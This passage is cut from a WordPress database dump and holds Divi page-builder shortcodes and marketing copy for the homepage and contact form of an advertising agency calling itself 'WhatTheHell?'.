button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2021-03-18 06:35:22','2021-03-18 06:35:22','',396,'https://wthtest1.in8.cdn-alpha.com/396-revision-v1/',0,'revision','',0),(786,1,'2021-03-22 11:14:24','2021-03-22 11:14:24','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.6\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"creative advertising agency in Delhi\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"digital agency\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" alt=\"creative agency\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"creative marketing agency.\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" 